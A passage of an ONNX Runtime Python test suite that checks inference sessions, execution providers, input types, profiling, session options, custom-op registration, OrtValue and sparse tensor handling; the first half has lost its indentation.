sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
sess.set_providers(['InvalidProvider'])
self.assertTrue('Unknown Provider Type: InvalidProvider' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=available_providers)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content, providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
# Skip this test for a "pure" DML onnxruntime python wheel.
# We keep this test enabled for instances where both DML and CUDA EPs are available
# (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence
# than DML and the nodes are assigned to only the CUDA EP (which supports this test).
if 'DmlExecutionProvider' in available_providers and 'CUDAExecutionProvider' not in available_providers:
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run()"
" on different threads using the same session object.")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so,
providers=available_providers_without_tvm)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"), providers=available_providers_without_tvm)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b'must', b'have', b'same', b'size'], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['must', 'have'], ['same', 'size']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=onnxrt.get_available_providers())
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path, providers=onnxrt.get_available_providers())
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
self.assertEqual('', modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, len(lines)-1):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[-1])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt,
providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"),
providers=available_providers_without_tvm)
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"),
providers=available_providers_without_tvm)
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt,
providers=available_providers_without_tvm)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"),
providers=onnxrt.get_available_providers())
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), sess_options=so,
providers=onnxrt.get_available_providers())
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so, providers=['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
    """Resolve and run a model node implemented by a custom-op shared library.

    Also checks that the SessionOptions carrying the registration can be
    reused, both via an alias and via a freshly created options object
    referencing the same library.
    """
    # Pick the platform-specific library name; the existence check is done
    # once below instead of being duplicated in every branch.
    if sys.platform.startswith("win"):
        shared_library = 'custom_op_library.dll'
    elif sys.platform.startswith("darwin"):
        shared_library = 'libcustom_op_library.dylib'
    else:
        shared_library = './libcustom_op_library.so'
    if not os.path.exists(shared_library):
        raise FileNotFoundError("Unable to find '{0}'".format(shared_library))

    this = os.path.dirname(__file__)
    custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
    if not os.path.exists(custom_op_model):
        raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))

    so1 = onnxrt.SessionOptions()
    so1.register_custom_ops_library(shared_library)

    # Model loading successfully indicates that the custom op node could be resolved successfully
    sess1 = onnxrt.InferenceSession(custom_op_model, sess_options=so1, providers=available_providers_without_tvm)
    # Run with input data
    input_name_0 = sess1.get_inputs()[0].name
    input_name_1 = sess1.get_inputs()[1].name
    output_name = sess1.get_outputs()[0].name
    input_0 = np.ones((3, 5)).astype(np.float32)
    input_1 = np.zeros((3, 5)).astype(np.float32)
    res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
    output_expected = np.ones((3, 5)).astype(np.float32)
    np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)

    # Create an alias of SessionOptions instance
    # We will use this alias to construct another InferenceSession
    so2 = so1
    # Model loading successfully indicates that the custom op node could be resolved successfully
    sess2 = onnxrt.InferenceSession(custom_op_model, sess_options=so2, providers=available_providers_without_tvm)

    # Create another SessionOptions instance with the same shared library referenced
    so3 = onnxrt.SessionOptions()
    so3.register_custom_ops_library(shared_library)
    sess3 = onnxrt.InferenceSession(custom_op_model, sess_options=so3, providers=available_providers_without_tvm)
def testOrtValue(self):
    """Build OrtValues from numpy, inspect their metadata, and feed them to a session.

    Covers CPU-backed OrtValues always, and CUDA-backed OrtValues when the
    CUDA execution provider is available.
    """
    numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    # Expected output equals the elementwise square of the input (mul_1.onnx
    # multiplies X with its initializer, which matches the input here).
    numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)

    def test_session_with_ortvalue_input(ortvalue):
        # Feed the OrtValue directly as the "X" input and compare against numpy.
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"),
                                       providers=onnxrt.get_available_providers())
        res = sess.run(["Y"], {"X": ortvalue})
        self.assertTrue(np.array_equal(res[0], numpy_arr_output))

    ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
    self.assertEqual(ortvalue1.device_name(), "cpu")
    self.assertEqual(ortvalue1.shape(), [3, 2])
    self.assertEqual(ortvalue1.data_type(), "tensor(float)")
    self.assertEqual(ortvalue1.is_tensor(), True)
    self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))

    # Pass in the constructed OrtValue to a session via Run() and check results
    test_session_with_ortvalue_input(ortvalue1)

    # The constructed OrtValue should still be valid after being used in a session
    self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))

    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
        self.assertEqual(ortvalue2.device_name(), "cuda")
        self.assertEqual(ortvalue2.shape(), [3, 2])
        self.assertEqual(ortvalue2.data_type(), "tensor(float)")
        self.assertEqual(ortvalue2.is_tensor(), True)
        self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))

        # Pass in the constructed OrtValue to a session via Run() and check results
        test_session_with_ortvalue_input(ortvalue2)

        # The constructed OrtValue should still be valid after being used in a session
        self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testOrtValue_ghIssue9799(self):
    """Regression test for GitHub issue #9799.

    Runs an identity model on CUDA over a range of leading-dimension sizes
    and checks the input round-trips unchanged.  Skipped implicitly when no
    CUDA execution provider is available.
    """
    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        session = onnxrt.InferenceSession(get_name("identity_9799.onnx"),
                                          providers=onnxrt.get_available_providers())
        # Sweep sequence lengths; the issue only reproduced at certain sizes.
        for seq_length in range(40, 200):
            inps = np.ones((seq_length, 16, 7, 5, 3, 3)).astype(np.float32)
            ort_val = onnxrt.OrtValue.ortvalue_from_numpy(inps, 'cuda', 0)
            upstreams_onnxrt = {'input': ort_val}
            outs = session.run(output_names=['output'], input_feed=upstreams_onnxrt)[0]
            self.assertTrue(np.allclose(inps, outs))
def testSparseTensorCooFormat(self):
    """COO-format SparseTensor: construction, read-only views, GC safety,
    string payloads, and (when available) CUDA copies."""
    cpu_device = onnxrt.OrtDevice.make('cpu', 0)
    shape = [9, 9]
    values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
    # Linear indices
    indices = np.array([3, 5, 15], dtype=np.int64)
    sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, values, indices, cpu_device)
    self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
    self.assertEqual(sparse_tensor.dense_shape(), shape)
    self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
    self.assertEqual(sparse_tensor.device_name(), 'cpu')

    # Get Data View on a numeric type.  Views must be read-only.
    values_ret = sparse_tensor.values()
    self.assertFalse(values_ret.flags.writeable)
    indices_ret = sparse_tensor.as_coo_view().indices()
    self.assertFalse(indices_ret.flags.writeable)
    # Run GC to test that values_ret still exhibits expected data
    gc.collect()
    self.assertTrue(np.array_equal(values, values_ret))
    self.assertTrue(np.array_equal(indices, indices_ret))

    # Test new Ortvalue interfaces: wrap the sparse tensor in an OrtValue
    # and get it back; views must still be valid and read-only.
    ort_value = onnxrt.OrtValue.ort_value_from_sparse_tensor(sparse_tensor)
    sparse_tensor = ort_value.as_sparse_tensor()
    values_ret = sparse_tensor.values()
    self.assertFalse(values_ret.flags.writeable)
    indices_ret = sparse_tensor.as_coo_view().indices()
    self.assertFalse(indices_ret.flags.writeable)
    gc.collect()

    # Test string data on cpu only, need to subst values only
    str_values = np.array(['xyz', 'yxz', 'zyx'], dtype=str)
    str_sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, str_values, indices, cpu_device)
    self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
    self.assertEqual(str_sparse_tensor.dense_shape(), shape)
    self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
    self.assertEqual(str_sparse_tensor.device_name(), 'cpu')

    # Get string values back
    str_values_ret = str_sparse_tensor.values()
    self.assertTrue(np.array_equal(str_values, str_values_ret))
    # Check indices
    str_indices_ret = str_sparse_tensor.as_coo_view().indices()
    gc.collect()
    self.assertFalse(str_indices_ret.flags.writeable)
    self.assertTrue(np.array_equal(indices, str_indices_ret))

    cuda_device = onnxrt.OrtDevice.make('cuda', 0)
    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        # Test to_cuda
        copy_on_cuda = sparse_tensor.to_cuda(cuda_device)
        self.assertEqual(copy_on_cuda.dense_shape(), shape)
        self.assertEqual(copy_on_cuda.data_type(), "sparse_tensor(float)")
        self.assertEqual(copy_on_cuda.device_name(), 'cuda')

        # Test that gpu copy would fail to copy to cuda
        with self.assertRaises(RuntimeError):
            copy_on_cuda.to_cuda(cuda_device)
        # Test that string tensor copy would fail
        with self.assertRaises(RuntimeError):
            str_sparse_tensor.to_cuda(cuda_device)
    else:
        # No cuda available
        with self.assertRaises(RuntimeError):
            sparse_tensor.to_cuda(cuda_device)
def testSparseTensorCsrFormat(self):
    """CSR(C)-format SparseTensor: construction, index views, string payloads,
    and (when available) a CUDA copy."""
    cpu_device = onnxrt.OrtDevice.make('cpu', 0)
    shape = [9, 9]
    values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
    inner_indices = np.array([1, 1, 1], dtype=np.int64)
    outer_indices = np.array([0, 1, 2, 3, 3, 3, 3, 3, 3, 3], dtype=np.int64)
    sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(shape, values, inner_indices, outer_indices, cpu_device)
    self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
    self.assertEqual(sparse_tensor.dense_shape(), shape)
    self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
    self.assertEqual(sparse_tensor.device_name(), 'cpu')

    # Test CSR(C) indices: views must be read-only and survive a GC pass.
    inner_indices_ret = sparse_tensor.as_csrc_view().inner()
    outer_indices_ret = sparse_tensor.as_csrc_view().outer()
    self.assertFalse(inner_indices_ret.flags.writeable)
    self.assertFalse(outer_indices_ret.flags.writeable)
    gc.collect()
    self.assertTrue(np.array_equal(inner_indices, inner_indices_ret))
    self.assertTrue(np.array_equal(outer_indices, outer_indices_ret))

    # Test with strings
    str_values = np.array(['xyz', 'yxz', 'zyx'], dtype=str)
    str_sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(shape, str_values, inner_indices, outer_indices, cpu_device)
    self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
    self.assertEqual(str_sparse_tensor.dense_shape(), shape)
    self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
    self.assertEqual(str_sparse_tensor.device_name(), 'cpu')

    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        cuda_device = onnxrt.OrtDevice.make('cuda', 0)
        cuda_sparse_tensor = sparse_tensor.to_cuda(cuda_device)
